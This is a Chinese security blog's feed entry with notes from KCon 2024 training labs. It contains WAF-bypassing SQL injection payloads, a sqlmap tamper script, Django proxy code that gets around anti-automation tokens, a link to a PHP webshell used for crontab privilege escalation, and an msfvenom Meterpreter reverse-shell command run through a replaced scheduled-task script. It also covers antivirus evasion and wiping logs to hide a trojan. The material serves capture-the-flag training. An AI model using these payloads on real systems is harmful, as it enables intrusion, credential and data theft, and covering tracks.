https://ruajingjing.top/tags/%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/Recent content in 安全培训 on 静静的安全笔记Hugo -- gohugo.iozh-CNSun, 25 Aug 2024 20:43:45 +0000https://ruajingjing.top/post/2024kcon%E5%9F%B9%E8%AE%AD/Sun, 25 Aug 2024 20:43:45 +0000https://ruajingjing.top/post/2024kcon%E5%9F%B9%E8%AE%AD/<img src="https://ruajingjing.top/" alt="Featured image of post 2024Kcon培训" /><h2 id="sql注入实战技巧注入过程中所发现的边缘信息的充分利用">SQL注入实战技巧（注入过程中所发现的边缘信息的充分利用） </h2><p><img alt="1724548902797" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724548902797.png"></p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">http://45.180.243.36/?id<span class="o">=</span>%221%22or%22<span class="o">=</span><span class="sb">`</span>uniunionon<span class="sb">`</span>%22 </span></span></code></pre></div><p><img alt="1724549149760" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724549149760.png"></p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">http://45.180.243.36/?id<span class="o">=</span>%221%22or%22<span class="o">=</span>%27uniunionon%0Aseseselectlectlect%0A1%27%22 </span></span></code></pre></div><p><img alt="1724549356538" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724549356538.png"></p> <ul> <li>slmap无法直接爆，有WAF</li> <li>过滤空格 %0A 绕过</li> <li>过滤union 双写可绕过</li> <li>过滤select，三写绕过</li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-plaintext" data-lang="plaintext"><span class="line"><span class="ln"> 1</span><span class="cl">45.180.243.220/?id=1or&#39;&#39;=&#39;&#39; </span></span><span class="line"><span class="ln"> 2</span><span class="cl">45.180.243.220/?id=&#34;1&#34;or&#39;&#39;=&#39;uniunionon /**/&#39; </span></span><span class="line"><span class="ln"> 3</span><span class="cl"> </span></span><span class="line"><span class="ln"> 4</span><span class="cl">http://45.180.243.220/?id=%221%22or%27%27=%27uniunionon%0A%27 </span></span><span class="line"><span class="ln"> 5</span><span class="cl"> </span></span><span class="line"><span class="ln"> 6</span><span class="cl">http://45.180.243.220/?id=%221%22or%27%27=%27uniunionon%0Aseseselectlectlect%27 </span></span><span class="line"><span class="ln"> 7</span><span class="cl"> </span></span><span class="line"><span class="ln"> 8</span><span class="cl">http://45.180.243.220/?id=1%0Auniunionon%0Aseseselectlectlect%0A1,2,3 </span></span><span class="line"><span class="ln"> 9</span><span class="cl"> </span></span><span class="line"><span class="ln">10</span><span class="cl">http://45.180.243.220/?id=555555%0Auniunionon%0Aseseselectlectlect%0A1,2,3 </span></span><span class="line"><span class="ln">11</span><span class="cl"> </span></span><span class="line"><span class="ln">12</span><span class="cl">45.180.243.220/?id=555555%0Auniunionon%0Aseseselectlectlect%0A1,2,scheman_name%0Afrom%0Ainformation_schema.schemata%0Alimit%0A1,1 </span></span><span class="line"><span class="ln">13</span><span class="cl"> </span></span><span class="line"><span class="ln">14</span><span class="cl">http://45.180.243.220/?id=555555%0Auniunionon%0Aseseselectlectlect%0A1,2,group_concat(table_name)%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema=”db_6XFkMpnM” </span></span><span class="line"><span class="ln">15</span><span class="cl"> </span></span><span class="line"><span class="ln">16</span><span class="cl">http://45.180.243.220/?id=555555%0Auniunionon%0Aseseselectlectlect%0A1,2,group_concat(column_name)%0Afrom%0Ainformation_schema.columns%0Awhere%0Atable_schema%0A=%0A%22db_6XFkMpnM%22 </span></span></code></pre></div><h2 id="实战案例sqlmap的使用技巧">实战案例(sqlmap的使用技巧) </h2><p><img alt="1724552538006" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724552538006.png"></p> <p>配置绕过规则复制tamper中的模板<code>cp .\space2plus.py 2024kcom.py</code>修改为如下内容。</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-py" data-lang="py"><span class="line"><span class="ln"> 1</span><span class="cl"><span class="ch">#!/usr/bin/env python</span> </span></span><span class="line"><span class="ln"> 2</span><span class="cl"> </span></span><span class="line"><span class="ln"> 3</span><span class="cl"><span class="s2">&#34;&#34;&#34; </span></span></span><span class="line"><span class="ln"> 4</span><span class="cl"><span class="s2">Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) </span></span></span><span class="line"><span class="ln"> 5</span><span class="cl"><span class="s2">See the file &#39;LICENSE&#39; for copying permission </span></span></span><span class="line"><span class="ln"> 6</span><span class="cl"><span class="s2">&#34;&#34;&#34;</span> </span></span><span class="line"><span class="ln"> 7</span><span class="cl"> </span></span><span class="line"><span class="ln"> 8</span><span class="cl"><span class="kn">from</span> <span class="nn">lib.core.compat</span> <span class="kn">import</span> <span class="n">xrange</span> </span></span><span class="line"><span class="ln"> 9</span><span class="cl"><span class="kn">from</span> <span class="nn">lib.core.enums</span> <span class="kn">import</span> <span class="n">PRIORITY</span> </span></span><span class="line"><span class="ln">10</span><span class="cl"> </span></span><span class="line"><span class="ln">11</span><span class="cl"><span class="n">__priority__</span> <span class="o">=</span> <span class="n">PRIORITY</span><span class="o">.</span><span class="n">LOW</span> </span></span><span class="line"><span class="ln">12</span><span class="cl"> </span></span><span class="line"><span class="ln">13</span><span class="cl"><span class="k">def</span> <span class="nf">dependencies</span><span class="p">():</span> </span></span><span class="line"><span class="ln">14</span><span class="cl"> <span class="k">pass</span> </span></span><span class="line"><span class="ln">15</span><span class="cl"> </span></span><span class="line"><span class="ln">16</span><span class="cl"><span class="k">def</span> <span class="nf">tamper</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span><span class="p">):</span> </span></span><span class="line"><span class="ln">17</span><span class="cl"> <span class="s2">&#34;&#34;&#34; </span></span></span><span class="line"><span class="ln">18</span><span class="cl"><span class="s2"> Replaces space character (&#39; &#39;) with plus (&#39;+&#39;) </span></span></span><span class="line"><span class="ln">19</span><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="ln">20</span><span class="cl"><span class="s2"> Notes: </span></span></span><span class="line"><span class="ln">21</span><span class="cl"><span class="s2"> * Is this any useful? The plus get&#39;s url-encoded by sqlmap engine invalidating the query afterwards </span></span></span><span class="line"><span class="ln">22</span><span class="cl"><span class="s2"> * This tamper script works against all databases </span></span></span><span class="line"><span class="ln">23</span><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="ln">24</span><span class="cl"><span class="s2"> &gt;&gt;&gt; tamper(&#39;SELECT id FROM users&#39;) </span></span></span><span class="line"><span class="ln">25</span><span class="cl"><span class="s2"> &#39;SELECT+id+FROM+users&#39; </span></span></span><span class="line"><span class="ln">26</span><span class="cl"><span class="s2"> &#34;&#34;&#34;</span> </span></span><span class="line"><span class="ln">27</span><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="n">payload</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">&#34;SELECT&#34;</span><span class="p">,</span><span class="s2">&#34;select&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="ln">28</span><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="n">payload</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">&#34;UNION&#34;</span><span class="p">,</span><span class="s2">&#34;union&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="ln">29</span><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="n">payload</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">&#34;union&#34;</span><span class="p">,</span><span class="s2">&#34;ununionion&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="ln">30</span><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="n">payload</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">&#34;select&#34;</span><span class="p">,</span><span class="s2">&#34;selselselectectect&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="ln">31</span><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="n">payload</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">&#34; &#34;</span><span class="p">,</span><span class="s2">&#34;%0A&#34;</span><span class="p">)</span> <span class="c1">#对应之前的绕过检查</span> </span></span><span class="line"><span class="ln">32</span><span class="cl"> <span class="k">return</span> <span class="n">payload</span> </span></span></code></pre></div><p>带参数绕过</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">sqlmap -u <span class="s2">&#34;http://45.180.243.31/sql.php?id=1&#34;</span> --tamper<span class="o">=</span>2024kcom.py --dbs -D db_YOARED3v -T db_flag --dump </span></span></code></pre></div><p><img alt="1724553613853" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724553613853.png"></p> <p><img alt="1724553724104" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724553724104.png"></p> <p><img alt="1724553753624" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724553753624.png"></p> <p><img alt="1724553794143" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724553794143.png"></p> <p><code>flag-{xxaq429524e6-ffd6-4c9c-8723-470f8e417424}</code></p> <p>同理也可以爆第一个靶场的flag</p> <p><code>flag-{xxaq61c44a35-6dce-4406-90b7-7c1cc1b5c5ae}</code></p> <p><img alt="1724554116524" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724554116524.png"></p> <h3 id="sql1php-随机值绕过">sql1.php 随机值绕过 </h3><p><img alt="1724554185408" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724554185408.png"></p> <p>前后两次数值不一样</p> <p>用django创建一个服务，获取动态值，返回即可。</p> <p>启动一个django服务</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">django-admin.exe startproject testsql </span></span></code></pre></div><p><img alt="1724554858820" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724554858820.png"></p> <p><img alt="1724554887738" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724554887738.png"></p> <p>创建一个 Kcon.py 文件内容如下。</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-py" data-lang="py"><span class="line"><span class="ln"> 1</span><span class="cl"><span class="kn">from</span> <span class="nn">django.http</span> <span class="kn">import</span> <span class="n">HttpResponse</span> </span></span><span class="line"><span class="ln"> 2</span><span class="cl"><span class="kn">import</span> <span class="nn">requests</span> </span></span><span class="line"><span class="ln"> 3</span><span class="cl"><span class="k">def</span> <span class="nf">testsql</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> </span></span><span class="line"><span class="ln"> 4</span><span class="cl"> <span class="k">with</span> <span class="n">requests</span><span class="o">.</span><span class="n">Session</span><span class="p">()</span> <span class="k">as</span> <span class="n">session</span><span class="p">:</span> </span></span><span class="line"><span class="ln"> 5</span><span class="cl"> <span class="n">req</span> <span class="o">=</span> <span class="n">session</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">&#34;http://45.180.243.152/sql1.php&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="ln"> 6</span><span class="cl"> <span class="n">req_list</span> <span class="o">=</span> <span class="n">req</span><span class="o">.</span><span class="n">text</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s2">&#34;&lt;strong&gt;&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="ln"> 7</span><span class="cl"> <span class="n">req_list</span> <span class="o">=</span> <span class="n">req_list</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s2">&#34;&lt;/strong&gt;&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="ln"> 8</span><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="n">req</span><span class="o">.</span><span class="n">text</span><span class="p">)</span> </span></span><span class="line"><span class="ln"> 9</span><span class="cl"> <span class="n">randome_value</span> <span class="o">=</span> <span class="n">req_list</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> </span></span><span class="line"><span class="ln">10</span><span class="cl"> <span class="n">data</span> <span class="o">=</span><span class="p">{</span> </span></span><span class="line"><span class="ln">11</span><span class="cl"> <span class="s2">&#34;id&#34;</span><span class="p">:</span><span class="n">request</span><span class="o">.</span><span class="n">GET</span><span class="p">[</span><span class="s2">&#34;id&#34;</span><span class="p">],</span> </span></span><span class="line"><span class="ln">12</span><span class="cl"> <span class="s2">&#34;random_value&#34;</span><span class="p">:</span><span class="n">randome_value</span> </span></span><span class="line"><span class="ln">13</span><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="ln">14</span><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="ln">15</span><span class="cl"> <span class="n">req</span> <span class="o">=</span> <span class="n">session</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="s2">&#34;http://45.180.243.152/sql1.php&#34;</span><span class="p">,</span><span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="ln">16</span><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="n">request</span><span class="o">.</span><span class="n">GET</span><span class="p">[</span><span class="s1">&#39;id&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="ln">17</span><span class="cl"> <span class="k">return</span> <span class="n">HttpResponse</span><span class="p">(</span><span class="n">req</span><span class="p">)</span> </span></span></code></pre></div><p>修改 url.py 文件，引入修改后的文件。</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-py" data-lang="py"><span class="line"><span class="ln">1</span><span class="cl"><span class="kn">from</span> <span class="nn">django.contrib</span> <span class="kn">import</span> <span class="n">admin</span> </span></span><span class="line"><span class="ln">2</span><span class="cl"><span class="kn">from</span> <span class="nn">django.urls</span> <span class="kn">import</span> <span class="n">path</span> </span></span><span class="line"><span class="ln">3</span><span class="cl"><span class="kn">from</span> <span class="nn">.</span> <span class="kn">import</span> <span class="n">view</span> </span></span><span class="line"><span class="ln">4</span><span class="cl"> </span></span><span class="line"><span class="ln">5</span><span class="cl"><span class="n">urlpatterns</span> <span class="o">=</span> <span class="p">[</span> </span></span><span class="line"><span class="ln">6</span><span class="cl"> <span class="n">path</span><span class="p">(</span><span class="s1">&#39;admin/&#39;</span><span class="p">,</span> <span class="n">admin</span><span class="o">.</span><span class="n">site</span><span class="o">.</span><span class="n">urls</span><span class="p">),</span> </span></span><span class="line"><span class="ln">7</span><span class="cl"> <span class="n">path</span><span class="p">(</span><span class="s1">&#39;testsql/&#39;</span><span class="p">,</span><span class="n">view</span><span class="o">.</span><span class="n">testsql</span><span class="p">),</span> </span></span><span class="line"><span class="ln">8</span><span class="cl"> <span class="n">path</span><span class="p">(</span><span class="s2">&#34;testsql2/&#34;</span><span class="p">,</span><span class="n">view</span><span class="o">.</span><span class="n">testsql2</span><span class="p">),</span> </span></span><span class="line"><span class="ln">9</span><span class="cl"><span class="p">]</span> </span></span></code></pre></div><p>启动django，打开django启动的页面会话，sqlmap爆</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">python manage.py runserver </span></span><span class="line"><span class="ln">2</span><span class="cl">python sqlmap.py -u <span class="s2">&#34;http://127.0.0.1:8000/testsql/?id=1&#34;</span> --dbs </span></span><span class="line"><span class="ln">3</span><span class="cl">python sqlmap.py -u <span class="s2">&#34;http://127.0.0.1:8000/testsql/?id=1&#34;</span> -D db_5l6KrvIg -T db_flag -C flag --dump </span></span></code></pre></div><p><img alt="1724557802736" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724557802736.png"></p> <h3 id="无回显">无回显 </h3><p><img alt="1724555970111" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724555970111.png"></p> <p>抓包后sqlmap爆</p> <p>原理sqlmap不能识别直接执行sql语句的id，但是浏览器抓包后的请求头可以识别。</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">python.exe .<span class="se">\s</span>qlmap.py -r D:<span class="se">\J</span>ingJing<span class="se">\D</span>ocuments<span class="se">\C</span>TF文件<span class="se">\C</span>TF刷题<span class="se">\2</span>024Kcon<span class="se">\n</span>orespon.txt -D db_t4P1AxlC -T </span></span><span class="line"><span class="ln">2</span><span class="cl"> db_flag -C flag --dump </span></span></code></pre></div><p><img alt="1724557916039" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724557916039.png"></p> <h3 id="有多余的执行步骤">有多余的执行步骤 </h3><p>view.py 中写入</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-py" data-lang="py"><span class="line"><span class="ln">1</span><span class="cl"><span class="k">def</span> <span class="nf">testsql2</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> </span></span><span class="line"><span class="ln">2</span><span class="cl"> <span class="n">data</span> <span class="o">=</span> <span class="p">{</span> </span></span><span class="line"><span class="ln">3</span><span class="cl"> <span class="s2">&#34;random_value&#34;</span> <span class="p">:</span> <span class="n">request</span><span class="o">.</span><span class="n">GET</span><span class="p">[</span><span class="s1">&#39;id&#39;</span><span class="p">],</span> </span></span><span class="line"><span class="ln">4</span><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="ln">5</span><span class="cl"> <span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="s2">&#34;http://45.180.243.152/sql3.php&#34;</span><span class="p">,</span><span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="ln">6</span><span class="cl"> <span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">&#34;http://45.180.243.152/sql3.php?id=run&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="ln">7</span><span class="cl"> <span class="k">return</span> <span class="n">HttpResponse</span><span class="p">(</span><span class="n">req</span><span class="p">)</span> </span></span></code></pre></div><p>url.py 末尾加上</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-py" data-lang="py"><span class="line"><span class="ln">1</span><span class="cl"><span class="n">path</span><span class="p">(</span><span class="s2">&#34;testsql2/&#34;</span><span class="p">,</span><span class="n">view</span><span class="o">.</span><span class="n">testsql2</span><span class="p">),</span> </span></span></code></pre></div><p>浏览器访问 <code>http://127.0.0.1:8000/testsql2/?id=select+1</code>用sqlmap爆</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">python sqlmap.py -u <span class="s2">&#34;http://127.0.0.1:8000/testsql2/?id=select+1&#34;</span> </span></span><span class="line"><span class="ln">2</span><span class="cl">python sqlmap.py -u <span class="s2">&#34;http://127.0.0.1:8000/testsql2/?id=select+1&#34;</span> -D db_fcfUEiY7 -T db_flag -C flag --dump </span></span></code></pre></div><p><img alt="1724557612258" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724557612258.png"></p> <p>django后台的数据</p> <p><img alt="1724557998504" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724557998504.png"></p> <h2 id="实战案例利用crontab完成特定化场景的提权">实战案例(利用crontab完成特定化场景的提权) </h2><p><img alt="1724566133947" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724566133947.png"></p> <p>过滤了多种函数，一句话木马不能用，网络存储挂载了crotab文件，并且权限不收敛，挂载使用的是目录，但是可以nfs漏洞可以让其访问所有认证。</p> <p><img alt="1724567460139" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724567460139.png"></p> <p><img alt="1724567474748" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724567474748.png"></p> <p>修改成大马的内容，<a class="link" href="https://raw.githubusercontent.com/su18/Stitch/master/stitch.php" target="_blank" rel="noopener" >https://raw.githubusercontent.com/su18/Stitch/master/stitch.php</a></p> <p><img alt="1724567530896" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724567530896.png"></p> <p>近后台找到backup有ctrontab文件，改了就行</p> <p><img alt="1724567996280" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724567996280.png"></p> <p><img alt="1724568012228" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724568012228.png"></p> <p><img alt="1724568031805" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724568031805.png"></p> <p><img alt="1724568237819" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724568237819.png"></p> <p><img alt="1724568806801" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724568806801.png"></p> <p>crontab新建的文件</p> <p><img alt="1724568864399" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724568864399.png"></p> <p><img alt="1724568890269" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724568890269.png"></p> <p>flag-{xxaqa7dac329-7a7d-44d1-9a5a-5ec4cff7efca}</p> <h2 id="实战案例windows操作系统下多种软件的免杀编写">实战案例(windows操作系统下多种软件的免杀编写) </h2><p>msfvenom生成木马，特征明显，容易被杀</p> <p>&ndash;list encodes 查看编码方式</p> <p>绕过工具</p> <ul> <li>shelter</li> <li>backdoor-factory 编码 白加黑</li> </ul> <p>socket执行python代码，服务器远控。<strong>加载器与恶意代码分离</strong>。</p> <p>原本绕不过defender，但是安装了卡巴斯基后可以绕过。卡巴斯基关闭的defender，但是他自己防护能力不强。</p> <h2 id="实战案例流量侧网络限制时的攻击绕过">实战案例（流量侧网络限制时的攻击绕过） </h2><p>绕过流量监测。</p> <p><img alt="1724572619580" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724572619580.png"></p> <p>能链接mssql，能用sql语句生成木马，但是外部不能链接。</p> <h2 id="实战案例windows系统仅有写权限时的getshell思路">实战案例(windows系统仅有写权限时的getshell思路) </h2><p>ftp去提权</p> <p><img alt="1724575227623" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724575227623.png"></p> <p><img alt="1724575284702" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724575284702.png"></p> <p><img alt="1724575375861" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724575375861.png"></p> <p>跳到计划任务相关文件夹，抓特定文件到本地读，分析，然后写到服务器。</p> <p><img alt="1724575789467" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724575789467.png"></p> <p><img alt="1724575843791" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724575843791.png"></p> <p>Kali 生成木马</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">msfvenom -p windows/meterpreter/reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>2.2.1.4 <span class="nv">LPORT</span><span class="o">=</span><span class="m">5252</span> -f exe -o test.exe </span></span></code></pre></div><p>修改test.bat文件为</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bat" data-lang="bat"><span class="line"><span class="ln">1</span><span class="cl"><span class="k">echo</span> <span class="s2">&#34;test&#34;</span> <span class="p">&gt;&gt;</span> test.txt </span></span><span class="line"><span class="ln">2</span><span class="cl"><span class="k">cd</span> C:\Users\Administrator\Desktop\ </span></span><span class="line"><span class="ln">3</span><span class="cl">test.exe </span></span></code></pre></div><p>删除原有bat文件，put上去新bat文件和木马 test.exe 文件</p> <p><img alt="1724577100296" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724577100296.png"></p> <p>Kali中用msfconsle起5252端口</p> <p><img alt="1724577221189" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724577221189.png"></p> <h2 id="apt案例新闻行业apt组织攻击与木马分析溯源">APT案例(新闻行业APT组织攻击与木马分析溯源) </h2><p>lsof -p 5386</p> <p><img alt="1724577516712" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1724577516712.png"></p> <p>检查端口文件，如果木马被删了可以从proc里面找。对应PID号文件夹里的exe就是打开的木马文件，在进程里的，除非重启。</p> <p>echo改掉日志文件才能完全隐藏木马痕迹。</p> <h3 id="升级方向">升级方向 </h3><ul> <li>流量加密</li> <li>sh和socket分离</li> <li>客户端改成被动式激活，减少流量</li> </ul>